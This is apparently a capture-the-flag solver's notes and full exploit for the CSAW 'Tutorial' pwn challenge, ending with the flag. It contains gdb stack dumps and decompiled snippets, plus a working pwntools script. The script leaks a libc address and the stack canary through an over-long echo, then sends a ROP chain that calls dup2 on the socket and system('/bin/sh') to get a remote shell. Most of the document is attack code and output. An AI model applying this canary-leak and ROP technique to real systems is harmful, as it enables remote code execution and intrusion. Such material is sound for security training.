thinking.txt
First need to make a local user called tutorial with a home dir
run binary and connect on localhost
what is getpwnam?
-Tutorial-
1.Manual
2.Practice
3.Quit
>1
Reference:0x7ffff7898490
-Tutorial-
1.Manual
2.Practice
3.Quit
>2
buffer overflow in 2.Practice
gdb-peda$ x/100wx 0x7fffffffe0e0
0x7fffffffe0e0: 0x41414141 0x0000000a 0x00000000 0x00000000
0x7fffffffe0f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe100: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe110: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe120: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe130: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe140: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe150: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe160: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe170: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe180: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe190: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe200: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe210: 0x00000000 0x00000000 0xa9acfd00 0x4042b240 <cookie
0x7fffffffe220: 0xffffe250 0x00007fff 0x00401053 0x00000000 <read up to first chunk
0x7fffffffe230: 0x00000003 0x00000000 0x00401401 0x00000004
0x7fffffffe240: 0xf7fd0a32 0x00007fff 0xf7bd4e00 0x00007fff
0x7fffffffe250: 0xffffe2c0 0x00007fff 0x00401257 0x00000000
0x7fffffffe260: 0xffffe3a8 0x00007fff 0xf7ff79b0 0x00000002
gdb-peda$ i f
Stack level 0, frame at 0x7fffffffe230:
rip = 0x400f70 in func2; saved rip = 0x401053
called by frame at 0x7fffffffe260
Arglist at 0x7fffffffe220, args:
Locals at 0x7fffffffe220, Previous frame's sp is 0x7fffffffe230
Saved registers:
rbp at 0x7fffffffe220, rip at 0x7fffffffe228
gdb-peda$ distance 0x7fffffffe0e0 0x7fffffffe228
From 0x7fffffffe0e0 to 0x7fffffffe228: 328 bytes, 82 dwords
328 A's then eip
stack cookies!
This is what 'reference' is
v1 = dlsym((void *)0xFFFFFFFF, "puts");
write(a1, "Reference:", 0xAuLL);
sprintf(&s, "%p\n", (char *)v1 - 1280);
write(a1, &s, 0xFuLL);
address of puts?
ok then
write(a1, ">", 1uLL);
read(a1, &s, 460uLL);
write(a1, &s, 324uLL);
/lib/x86_64-linux-gnu/libc-2.19.so
it reads out the stack cookie to me! yay
0x7fffffffe200: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe210: 0x00000000 0x00000000 0xa9acfd00 0x4042b240 <cookie
0x7fffffffe220: 0xffffe250 0x00007fff 0x00401053 0x00000000 <read up to first chunk
0x7fffffffe230: 0x00000003 0x00000000 0x00401401 0x00000004
so send 312 'A's; that will put it just up against the stack
cookie
then I will read it
then I will do it again but sub the cookie in + eip
0x7fffffffe000: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe030: 0x00000000 0x00000000 0xf7ddb0f0 0x00007fff
0x7fffffffe040: 0xf7dd0000 0x00007fff 0x00000000 0x00000000
0x7fffffffe050: 0x00000000 0x00000000 0xf7ffe500 0x00007fff
0x7fffffffe060: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe070: 0xa5b50f0b 0x00000000 0x0040066c 0x00000000
0x7fffffffe080: 0xffffffff 0x00000000 0x00000000 0x00000000
0x7fffffffe090: 0xf7831b38 0x00007fff 0xf7bd1760 0x00007fff
0x7fffffffe0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0c0: 0xffffe220 0x00007fff 0x00400f54 0x00000000
0x7fffffffe0d0: 0xffffe3a0 0x00007fff 0xf787deb7 0x00000004
0x7fffffffe0e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe100: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe110: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe120: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe130: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe140: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe150: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe160: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe170: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe180: 0x00000000 0x00000000 0x00000000 0x00000000
gdb-peda$
0x7fffffffe190: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe1f0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe200: 0x00000000 0x00000000 0x00000000 0x41414141
0x7fffffffe210: 0x41414141 0x0a3a3a3a 0x64605000 0xdc70460a
0x7fffffffe220: 0xffffe250 0x00007fff 0x00401053 0x00000000
0x7fffffffe230: 0x00000000 0x00000000 0x00401401 0x00000004
0x7fffffffe240: 0xffff0a32 0x00007fff 0xf7bd4e00 0x00007fff
0x7fffffffe250: 0xffffe2c0 0x00007fff 0x00401257 0x00000000
0x7fffffffe260: 0xffffe3a8 0x00007fff 0xf7ff79b0 0x00000002
0x7fffffffe270: 0xf7ffe1a8 0x00000000 0x00000000 0x00000010
0x7fffffffe280: 0x00000003 0x00000004 0x00000000 0x00000000
0x7fffffffe290: 0xd3040002 0x00000000 0x00000000 0x00000000
0x7fffffffe2a0: 0xec9a0002 0x0100007f 0x00000000 0x00000000
0x7fffffffe2b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2f0: 0x00000000 0x00000000 0x4e19b21d 0x2f80f992
0x7fffffffe300: 0x00400c90 0x00000000 0xffffe3a0 0x00007fff
0x7fffffffe310: 0x00000000 0x00000000 0x00000000 0x00000000
after
gdb-peda$ x/100wx 0x7fffffffe000
0x7fffffffe000: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe030: 0x00000000 0x00000000 0xf7ddb0f0 0x00007fff
0x7fffffffe040: 0xf7dd0000 0x00007fff 0x00000000 0x00000000
0x7fffffffe050: 0x00000000 0x00000000 0xf7ffe500 0x00007fff
0x7fffffffe060: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe070: 0xa5b50f0b 0x00000000 0x0040066c 0x00000000
0x7fffffffe080: 0xffffffff 0x00000000 0x00000000 0x00000000
0x7fffffffe090: 0xf7831b38 0x00007fff 0xf7bd1760 0x00007fff
0x7fffffffe0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0c0: 0xffffe220 0x00007fff 0x00400f70 0x00000000
0x7fffffffe0d0: 0xffffe3a0 0x00007fff 0xf787deb7 0x00000004
0x7fffffffe0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe100: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe110: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe120: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe130: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe140: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe150: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
gdb-peda$
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1c0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1d0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe200: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe210: 0x41414141 0x3a3a3a3a 0x64605000 0xdc70460a
0x7fffffffe220: 0xffffe250 0x00007fff 0xf7898990 0x00007fff
0x7fffffffe230: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe240: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe250: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe260: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe270: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe280: 0x0000000a 0x00000004 0x00000000 0x00000000
0x7fffffffe290: 0xd3040002 0x00000000 0x00000000 0x00000000
0x7fffffffe2a0: 0xec9a0002 0x0100007f 0x00000000 0x00000000
0x7fffffffe2b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2f0: 0x00000000 0x00000000 0x4e19b21d 0x2f80f992
0x7fffffffe300: 0x00400c90 0x00000000 0xffffe3a0 0x00007fff
0x7fffffffe310: 0x00000000 0x00000000 0x00000000 0x00000000
on ret
gdb-peda$ x/100wx 0x7fffffffe000
0x7fffffffe000: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe010: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe020: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe030: 0x00000000 0x00000000 0xf7ddb0f0 0x00007fff
0x7fffffffe040: 0xf7dd0000 0x00007fff 0x00000000 0x00000000
0x7fffffffe050: 0x00000000 0x00000000 0xf7ffe500 0x00007fff
0x7fffffffe060: 0xffffffff 0xffffffff 0x00000000 0x00000000
0x7fffffffe070: 0xa5b50f0b 0x00000000 0x0040066c 0x00000000
0x7fffffffe080: 0xffffffff 0x00000000 0x00000000 0x00000000
0x7fffffffe090: 0xf7831b38 0x00007fff 0xf7bd1760 0x00007fff
0x7fffffffe0a0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe0c0: 0xffffe220 0x00007fff 0x00400f8c 0x00000000
0x7fffffffe0d0: 0xffffe3a0 0x00007fff 0xf787deb7 0x00000004
0x7fffffffe0e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe0f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe100: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe110: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe120: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe130: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe140: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe150: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe160: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe170: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe180: 0x41414141 0x41414141 0x41414141 0x41414141
gdb-peda$
0x7fffffffe190: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1a0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1b0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1c0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1d0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe1f0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe200: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe210: 0x41414141 0x3a3a3a3a 0x64605000 0xdc70460a
0x7fffffffe220: 0xffffe250 0x00007fff 0xf7898990 0x00007fff
0x7fffffffe230: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe240: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe250: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe260: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe270: 0xf79909a0 0x00007fff 0xf79909a0 0x00007fff
0x7fffffffe280: 0x0000000a 0x00000004 0x00000000 0x00000000
0x7fffffffe290: 0xd3040002 0x00000000 0x00000000 0x00000000
0x7fffffffe2a0: 0xec9a0002 0x0100007f 0x00000000 0x00000000
0x7fffffffe2b0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2c0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2d0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2e0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffe2f0: 0x00000000 0x00000000 0x4e19b21d 0x2f80f992
0x7fffffffe300: 0x00400c90 0x00000000 0xffffe3a0 0x00007fff
0x7fffffffe310: 0x00000000 0x00000000 0x00000000 0x00000000
So what was happening was that puts was pushing rbx onto the stack and
calling strcpy which then segfaulted
I figure I need to put &/bin/sh into ebx
# 0x004012e1 : (5e415fc3) pop rsi; pop r15; ret
# 0x00400d49 : (01f3c3) add ebx,esi; ret
this will accomplish this
nope nope nope
let's go straight to system
so we need to set
# rdi rsi
to call system
put addr of /bin/sh in rdi call system
tried that
pops shell locally ... on the server side
need to dup dup dup
dup = 0x7ffff7909460 - 0x7ffff7898490 + int(ref,16)
use same leak trick
hope it works XD
rdi already has the file descriptor
so that's helpful
:)
dup2(old,new)
need to
dup2(fd,0)
dup2(fd,1)
dup2(fd,2)
k so I can pop a shell locally
fuk I'm like so close
I need to find /bin/sh on the box
puts 0x7f620ea3a990
binsh 0x7f620eb329a0
puts - binsh =
0xf8010
in the lib c
puts 0x06b990
binsh_l 0x01639a0
#!/usr/bin/python
import sys
from pwn import *
# Start every run with an empty ``payload`` log in the working directory;
# send() appends each transmitted line to it later.  Opening in 'w' mode is
# enough to create or truncate the file, so nothing needs to be written.
with open('payload', 'w'):
    pass
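def send(conn, line):
    """Send *line* over *conn* and append the same bytes to the ``payload`` log.

    Args:
        conn: a pwntools tube; only its ``sendline`` method is used.
        line: str to transmit.  ``sendline`` appends the trailing newline
            itself, so callers pass the bare line.

    Side effects:
        Prints *line* to stdout and appends ``line + "\\n"`` to the local
        ``payload`` file, so the exact wire bytes can be inspected or
        replayed offline.
    """
    # print() with a single argument behaves the same under Python 2 and 3;
    # the statement form the script originally used is Python 2 only.
    print(line)
    conn.sendline(line)
    # Mirror the newline that sendline adds so the log matches the traffic.
    with open('payload', 'a') as log_file:
        log_file.write(line + '\x0a')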
# conn = remote("pwn.chal.csaw.io",8002)
# Root cause, per the decompiled snippet in the notes above: "Practice" does
# read(fd, &s, 460) into a stack buffer that sits 312 bytes below the canary,
# then write(fd, &s, 324) echoes more than the buffer holds.  Bounding the read
# to the buffer size and echoing only the bytes actually received would close
# both the overflow and the canary disclosure.
# Connect to a locally started instance; the listening port comes from argv[1].
conn = remote("localhost", int(sys.argv[1]))
print conn.recvuntil(">")
# Menu option 1 ("Manual") answers with a pointer labelled "Reference:".
send(conn, "1")
print conn.recvuntil("Reference:")
# ref is the "%p\n" text; the notes show it is printed as puts - 1280.
ref = conn.recvuntil("\n")
print ref
print conn.recvuntil(">")
# Menu option 2 ("Practice"): the over-long read described above.
send(conn, "2")
# raw_input("continue?")
# First pass: fill the buffer up to, but not over, the canary.  With the "\n"
# that send() appends this is exactly 312 bytes; ":::" marks where the echoed
# copy should be split.
send(conn, "A"*(312-4)+":::")
print conn.recvuntil(":::")
# Remainder of the 324-byte echo: lstrip() drops the "\n" that precedes the
# canary, and [:-4] drops the 4 bytes the echo reaches past the 8-byte canary
# (312 + 8 + 4 = 324), leaving exactly the canary for u64().
cookie = conn.recvuntil("-Tutorial-")[:-len("-Tutorial-")].lstrip()[:-4]
print cookie
print cookie.encode('hex')
print hex(u64(cookie))
print conn.recvuntil(">")
#0x400eef: dec ecx; ret
misc_rop = p64(0x400eef)  # not used in the final chain
# [heap] : 0x603035 --> 0x68732f6e69622f ('/bin/sh')
# libc : 0x7ffff79909a0 --> 0x68732f6e69622f ('/bin/sh')
# 0x7ffff7898490 ref
# Undo the -1280 applied before printing to recover the address of puts.
puts_libc = int(ref,16)+1280
puts = p64(puts_libc)  # not used in the final chain
# b = 0x7ffff79909a0 - 0x7ffff7898490 + int(ref,16)
# addr_binsh = p64(b)
# dup2 = p64(0x7ffff7909490 - 0x7ffff7898490 + int(ref,16))
# system = p64(0x7ffff786e490- 0x7ffff7898490 + int(ref,16))
# The commented-out deltas above came from a local debugger session; the
# symbol offsets below are the ones the script actually uses.
# puts 000000000006fd60
# system 0000000000046590
# dup2 00000000000ebe90
sysMputs = 0x46590 - 0x6fd60  # system - puts
dupMputs = 0xebe90 - 0x6fd60  # dup2 - puts
system = p64(puts_libc + sysMputs)
dup2 = p64(puts_libc + dupMputs)
# "/bin/sh" at the fixed heap address noted in the debugger (see comment above).
addr_binsh = p64(0x603035)
# Saved-rbp slot value, copied from the debugger dump in the notes.
ebp = p64(0x00007fffffffe250)
# # null
# null = p64(0x400007)
# 0x004012e1 : (5e415fc3) pop rsi; pop r15; ret
# 0x00400d49 : (01f3c3) add ebx,esi; ret
rop_pop_rsi_pop = p64(0x004012e1)
rop_add_ebx_esi = p64(0x00400d49)  # left over from the abandoned ebx approach; unused
#0x4012dc: pop r12; pop r13; pop r14; pop r15; ret
#0x4012e3: pop rdi; ret
pop_rdi = p64(0x4012e3)
pops = p64(0x4012dc)  # unused
print ref
# rdi rsi
# rdi is already the fd for socket :) yay
# Second pass through "Practice": the same 312-byte prefix, then the leaked
# canary and a saved-rbp value, so the return address is reached with the
# stack protector's check still passing.
send(conn, "2")
payload = "A"*(312-4)+"::::" + cookie + ebp
# dup2(fd, stdin)
# Each step: rsi <- target descriptor, r15 <- filler, ret into dup2 with rdi
# still holding the client socket.  This is the "need to dup dup dup" fix from
# the notes: without it the shell's stdio stays on the server side.
payload += rop_pop_rsi_pop + p64(0) + "A"*8 + dup2
payload += rop_pop_rsi_pop + p64(1) + "A"*8 + dup2
payload += rop_pop_rsi_pop + p64(2) + "A"*8 + dup2
# rdi <- "/bin/sh", then ret into system.
payload += pop_rdi + addr_binsh + system
send(conn, payload)
send(conn, "ls -la")
conn.interactive()
FLAG{3ASY_R0P_R0P_P0P_P0P_YUM_YUM_CHUM_CHUM}